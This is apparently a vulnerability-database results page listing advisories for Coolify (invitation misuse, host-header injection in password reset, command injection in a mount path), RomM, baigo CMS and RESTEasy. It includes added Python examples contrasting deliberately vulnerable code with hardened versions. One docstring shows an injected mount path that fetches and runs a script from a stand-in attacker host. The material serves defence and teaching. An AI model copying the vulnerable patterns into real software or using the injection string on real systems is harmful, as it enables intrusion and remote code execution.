8 matches found

NVD
added 2026/01/05 9:16 p.m. · 2 views

CVE-2025-64423

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a low-privileged member user can see and use invitation links sent to an administrator. When they use the link before the legitimate recipie...

CVSS 8.8 · EPSS 0.00061
Exploits: 1 · References: 1
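The summary above describes an invitation token that any authenticated member can redeem, not only the administrator it was sent to. The Python below is an added example, not Coolify's code and not taken from the advisory: it models that acceptance check next to one that binds the token to the invitee's e-mail address, makes it single-use and expires it. The class, method and field names, the roles and the e-mail addresses are assumptions made for the example.

```python
"""Invitation tokens bound to their intended recipient.

Added example, not Coolify's code. It models the weakness summarised for
CVE-2025-64423 (a logged-in low-privileged member redeeming an invitation
that was sent to an administrator) and contrasts it with an acceptance
check that binds each token to the invitee's e-mail, makes it single-use
and expires it. Class, function and field names are this example's own.
"""
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass
class Invitation:
    token: str
    email: str          # address the invitation was mailed to (lower-cased)
    role: str           # role granted on acceptance, e.g. "admin"
    expires_at: float
    used: bool = False


class InvitationStore:
    def __init__(self, ttl_seconds: int = 7 * 24 * 3600,
                 now: Callable[[], float] = time.time) -> None:
        self._now = now
        self._ttl = ttl_seconds
        self._by_token: Dict[str, Invitation] = {}

    def create(self, email: str, role: str) -> Invitation:
        inv = Invitation(token=secrets.token_urlsafe(32), email=email.lower(),
                         role=role, expires_at=self._now() + self._ttl)
        self._by_token[inv.token] = inv
        return inv

    def _lookup(self, token: str) -> Optional[Invitation]:
        # Constant-time comparison per stored token; invite tables are small.
        for stored, inv in self._by_token.items():
            if hmac.compare_digest(stored.encode(), token.encode()):
                return inv
        return None

    def accept_unchecked(self, token: str, acting_user_email: str) -> str:
        """Vulnerable pattern: whoever presents a valid token gets the role.

        The invitee is never compared with the logged-in user, so any member
        who can see the link can redeem an administrator's invitation before
        the administrator does. (Showing invitations to other members at all
        is the other half of the problem; this code only covers the check.)
        """
        inv = self._lookup(token)
        if inv is None:
            raise PermissionError("unknown invitation")
        inv.used = True
        return inv.role

    def accept(self, token: str, acting_user_email: str) -> str:
        """Hardened pattern: the token must be unused, unexpired and issued to
        the e-mail address of the authenticated user redeeming it."""
        inv = self._lookup(token)
        if inv is None or inv.used:
            raise PermissionError("invitation invalid or already used")
        if self._now() > inv.expires_at:
            raise PermissionError("invitation expired")
        if inv.email != acting_user_email.lower():
            raise PermissionError("invitation was issued to a different user")
        inv.used = True   # single use: a second redemption is refused
        return inv.role


def redemption_refused(store: InvitationStore, token: str, email: str) -> bool:
    """True if the hardened check rejects this (token, user) pair."""
    try:
        store.accept(token, email)
    except PermissionError:
        return True
    return False
```

The identity check is the part that matters: the token proves the link was received, the session proves who is redeeming it, and only the pair together should grant the role. Keeping the token out of any listing other members can see is the complementary fix.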
OSV
added 2026/01/05 8:49 p.m. · 1 view

CVE-2025-64425 Coolify has host header injection in forgot password

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, an attacker can initiate a password reset for a victim, and modify the host header of the request to a malicious value. The victim will...

CVSS 8.5 · AI score 6.8 · EPSS 0.00039
Exploits: 1 · References: 4
CVE
added 2026/01/05 8:49 p.m. · 9 views

CVE-2025-64425

CVE-2025-64425 affects Coolify up to v4.0.0-beta.434. The vulnerability arises in the password reset flow where an attacker can modify the host header of the request. The victim receives a reset email containing a link to the attacker’s host; when the user clicks it, the reset token is sent to th...

CVSS 8.5 · AI score 6.6 · EPSS 0.00039
Exploits: 1 · References: 2 · Affected software: 1
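Both CVE-2025-64425 entries above describe the same mechanism: the reset link is assembled from the request's Host header, so a forged header makes the victim's mail point at the attacker's server with the token attached. The Python below is an added example, not Coolify's code: it shows that link construction beside one that takes the authority from a configured canonical URL and refuses requests whose Host is not on an allowlist. APP_URL, ALLOWED_HOSTS, the hostnames and the function names are assumptions made for the example.

```python
"""Password-reset links derived from the Host header.

Added example, not Coolify's code. It models the flaw summarised for
CVE-2025-64425: the reset URL is built from the request's Host header, so
an attacker who requests a reset for the victim with a forged Host causes a
mail to reach the victim that points at the attacker's server and carries
the reset token. The hardened version builds the link from a configured
canonical URL and refuses requests whose Host is not on an allowlist.
APP_URL, ALLOWED_HOSTS and the function names are this example's own.
"""
import re
from typing import Mapping
from urllib.parse import urlencode, urlsplit, urlunsplit

APP_URL = "https://coolify.example.internal"            # constructed config
ALLOWED_HOSTS = {"coolify.example.internal", "coolify.example.internal:443"}

# Host header grammar we are willing to accept: a hostname and optional port.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?(?::\d{1,5})?$")


def reset_link_from_host_header(headers: Mapping[str, str], token: str) -> str:
    """Vulnerable: the link's authority is whatever Host the client sent.

    Frameworks behind a reverse proxy often consult X-Forwarded-Host the same
    way; it needs the same treatment as Host.
    """
    host = headers.get("Host", "")
    return f"https://{host}/reset-password?{urlencode({'token': token})}"


def host_is_trusted(host: str) -> bool:
    """Allowlist check on the Host header; rejects malformed and unknown hosts."""
    return bool(_HOST_RE.match(host)) and host.lower() in ALLOWED_HOSTS


def reset_link_canonical(headers: Mapping[str, str], token: str) -> str:
    """Hardened: the link is assembled from APP_URL; Host is only validated.

    Refusing an unexpected Host (rather than silently substituting APP_URL)
    also blocks cache-poisoning and other host-header tricks in the same app.
    """
    host = headers.get("Host", "")
    if not host_is_trusted(host):
        raise ValueError(f"unexpected Host header: {host!r}")
    base = urlsplit(APP_URL)
    return urlunsplit((base.scheme, base.netloc, "/reset-password",
                       urlencode({"token": token}), ""))


def reset_refused(headers: Mapping[str, str], token: str) -> bool:
    """True if the hardened builder refuses to issue a link for this request."""
    try:
        reset_link_canonical(headers, token)
    except ValueError:
        return True
    return False


def link_host(url: str) -> str:
    """Authority component of a URL, i.e. where the victim's click will go."""
    return urlsplit(url).netloc
```

The check on Host is deliberately a rejection rather than a rewrite: once the application has a canonical URL, an unexpected Host is a signal that something between the client and the app is lying, and nothing in the request should be trusted to build absolute URLs.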
CNNVD
added 2026/01/05 12:00 a.m. · 2 views

Coolify security vulnerability

Coolify is an open source and self-hosted Heroku/Netlify/Vercel replacement from coolLabs Open Source. A security vulnerability exists in Coolify v4.0.0-beta.434 and earlier versions, which stems from a low-privileged user being able to invite a high-privileged user, potentially resulting in...

CVSS 8.7 · AI score 6.5 · EPSS 0.00037
Exploits: 1 · References: 2
OSV
added 2025/12/23 10:06 p.m. · 2 views

CVE-2025-66213 Coolify Vulnerable to Authenticated Remote Code Execution via Command Injection in File Storage Directory Mount Path

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the File Storage Directory Mount Path functionality allows users with application/service management permissions...

CVSS 9.4 · AI score 9.1 · EPSS 0.0025
Exploits: 2 · References: 6
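The CVE-2025-66213 summary describes a mount path typed by a user with application or service management rights that ends up inside a command executed on the host. The Python below is an added example, not Coolify's code and not a reconstruction of the vulnerable function: it shows the generic pattern of splicing a path into a shell string, a tokeniser-based demonstration of why that yields a second command, and a hardened builder that allowlists characters, confines the path to a base directory and hands it to the process as its own argv element. ALLOWED_BASE, the mkdir command and all names are assumptions made for the example.

```python
"""A user-supplied mount path that reaches a shell.

Added example, not Coolify's code. CVE-2025-66213 is summarised as command
injection through the File Storage Directory Mount Path, i.e. a path typed
by a user with application/service management rights ends up inside a
command run on the host. Below, the vulnerable pattern splices the path into
one shell string; the hardened pattern validates the path, confines it to a
base directory and passes it as its own argv element so no shell parses it.
ALLOWED_BASE, the mkdir command and all names are this example's own.
"""
import posixpath
import re
import shlex
from typing import List

ALLOWED_BASE = "/data/coolify/applications"          # constructed for the example
_SAFE_PATH_RE = re.compile(r"^/[A-Za-z0-9._/-]*$")     # absolute, conservative charset


def mkdir_command_vulnerable(mount_path: str) -> str:
    """Vulnerable: the string is later handed to `sh -c` (or shell=True).

    '/data/app; curl attacker.example/x | sh' becomes two commands once the
    shell tokenises it, running with the privileges of the host-side process.
    """
    return f"mkdir -p {mount_path}"


def shell_command_count(command: str) -> int:
    """How many commands a POSIX shell would see in `command`.

    shlex in punctuation_chars mode emits ';', '|', '||', '&&' as their own
    tokens; we count those separators. Substitutions such as $(...) are not
    separators and are not counted here; the allowlist below rejects them.
    """
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    separators = {";", "|", "||", "&&", "&"}
    return 1 + sum(1 for tok in lexer if tok in separators)


def mkdir_argv_hardened(mount_path: str) -> List[str]:
    """Hardened: returns argv for subprocess.run(argv) with no shell involved.

    Steps: allowlist the characters, normalise away '..' and duplicate
    slashes, require the result to live under ALLOWED_BASE, and terminate
    option parsing with '--'. On a real host, also resolve symlinks with
    os.path.realpath before the containment check.
    """
    if not _SAFE_PATH_RE.match(mount_path):
        raise ValueError("mount path contains disallowed characters")
    normalized = posixpath.normpath(mount_path)
    if normalized != ALLOWED_BASE and not normalized.startswith(ALLOWED_BASE + "/"):
        raise ValueError("mount path escapes the allowed base directory")
    return ["mkdir", "-p", "--", normalized]


def mount_path_rejected(mount_path: str) -> bool:
    """True if the hardened builder refuses this path."""
    try:
        mkdir_argv_hardened(mount_path)
    except ValueError:
        return True
    return False
```

Passing an argv list is what removes the shell from the picture; the character allowlist and the containment check are there for the path-semantics problems (traversal, option injection via a leading dash) that remain even when no shell is involved.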
CNNVD
added 2025/07/21 12:00 a.m. · 2 views

Romm code issue vulnerability

Romm is an open source ROM (read-only memory) manager from The RomM Project. A code issue vulnerability exists in Romm 4.0.0-beta.3 and prior versions that stems from improper access control of the /api/saves endpoint, which could lead to arbitrary file writes and remote code execution...

CVSS 9.4 · AI score 7.9 · EPSS 0.03071
Exploits: 0 · References: 2
Positive Technologies
added 2021/07/08 12:00 a.m. · 3 views

PT-2021-10508 · Baigo Cms · Baigo Cms

Name of the vulnerable software and affected versions: baigo CMS version 4.0-beta-1
Description: A cross-site scripting issue allows attackers to execute arbitrary web scripts or HTML via the post parameter to the "/public/console/profile/info-submit/" API endpoint.
Recommendations: For baigo CMS...

CVSS 6.1 · AI score 6.1 · EPSS 0.00493
Exploits: 1 · References: 5
Snyk
added 2021/05/28 12:51 p.m. · 3 views

Cross-site Scripting (XSS)

Overview: org.jboss.resteasy:resteasy-jaxrs is an implementation of the JCP specification that provides a Java API for RESTful Web Services over the HTTP protocol. Affected versions of this package are vulnerable to Cross-site Scripting (XSS). It did not properly handle URL encoding when the RESTEASY003870 exception occur...

CVSS 7.1 · AI score 5.4 · EPSS 0.00344
Exploits: 1 · References: 2